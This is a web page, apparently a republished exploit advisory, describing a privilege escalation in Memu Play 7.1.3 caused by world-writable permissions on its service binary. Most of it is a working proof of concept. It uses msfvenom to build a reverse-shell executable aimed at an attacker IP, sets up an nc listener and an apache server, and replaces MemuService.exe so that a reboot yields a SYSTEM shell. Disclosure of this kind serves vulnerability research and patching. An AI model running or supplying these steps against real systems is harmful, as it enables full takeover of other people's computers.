Exploit/Advisories

Published on April 6th, 2020 📆 | 2918 Views ⚑

0

Memu Play 7.1.3 – Insecure Folder Permissions


Speech Synthesis

# Exploit Title: Memu Play 7.1.3 - Insecure Folder Permissions
# Discovery by: chuyreds
# Discovery Date: 2020-03-08
# Vendor Homepage: https://www.memuplay.com/
# Software Link : https://www.memuplay.com/download-en.php?file_name=Memu-Setup&from=official_release
# Tested Version: 7.1.3
# Vulnerability Type: Local
# Tested on OS: Windows 10 Pro x64 es

# Description:
#  Memu Play 7.1.3 suffers from Privilege Escalation due to insecure file permissions

# Prerequisites
# Local, Low privilege access with restart capabilities

# Details
# By default the Authenticated Users group has the modify permission to ESM folders/files as shown below.  
# A low privilege account is able to rename the MemuService.exe file located in this same path and replace 
# with a malicious file that would connect back to an attacking computer giving system level privileges 
# (nt authoritysystem) due to the service running as Local System.  
# While a low privilege user is unable to restart the service through the application, a restart of the 
# computer triggers the execution of the malicious file.

C:>icacls "C:Program Files (x86)MicrovirtMEmuMemuService.exe"
C:Program Files (x86)MicrovirtMEmuMemuService.exe Everyone:(I)(F)
                                                      BUILTINAdministradores:(I)(F)
                                                      BUILTINUsuarios:(I)(F)
                                                      NT AUTHORITYSYSTEM:(I)(F)
                                                      APPLICATION PACKAGE AUTHORITYALL APPLICATION PACKAGES:(I)(RX)
                                                      APPLICATION PACKAGE AUTHORITYTODOS LOS PAQUETES DE APLICACIÓN RESTRINGIDOS:(I)(RX)

Se procesaron correctamente 1 archivos; error al procesar 0 archivos


C:>sc qc MEmuSVC
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: MEmuSVC
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: "C:Program Files (x86)MicrovirtMEmuMemuService.exe"
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : MEmuSVC
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem

# Proof of Concept

1. Generate malicious .exe on attacking machine
    msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.130 LPORT=443 -f exe > /var/www/html/MemuService.exe

2. Setup listener and ensure apache is running on attacking machine
    nc -lvp 443
    service apache2 start

3. Download malicious .exe on victim machine
    Open browser to http://192.168.1.130/MemuService.exe and download

4. Overwrite file and copy malicious .exe.
    Renename C:Program Files (x86)MicrovirtMEmuMemuService.exe > MemuService.bak
    Copy/Move downloaded 'MemuService.exe' file to C:Program Files (x86)MicrovirtMEmu

5. Restart victim machine

6. Reverse Shell on attacking machine opens
    C:Windowssystem32>whoami
    whoami
    nt authoritysystem





Source link

Tagged with:



Comments are closed.






© Torchsec  Privacy Policy Disclaimer  T&C



Back to Top ↑